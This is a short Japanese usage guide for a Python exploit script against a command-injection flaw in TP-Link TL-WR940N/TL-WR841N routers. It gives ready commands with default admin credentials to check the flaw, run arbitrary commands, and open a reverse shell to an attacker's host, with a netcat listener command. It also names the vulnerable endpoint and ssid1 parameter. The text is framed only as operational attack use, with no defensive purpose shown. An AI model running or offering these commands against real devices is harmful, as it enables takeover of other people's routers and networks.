
TP-Link TL-WR940N/TL-WR841N コマンドインジェクション脆弱性の Python エクスプロイト
基本的な脆弱性チェック:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
カスタムコマンドの実行:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
リバースシェル (先にリスナーを nc -lvnp 4444 でセットアップ):
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
重要な注意点:
この脆弱性は、/userRpm/WlanNetworkRpm.htm エンドポイントの ssid1 パラメータにおける不適切な入力サニタイズに起因し、特別に細工されたリクエストによるコマンドインジェクションを許容します。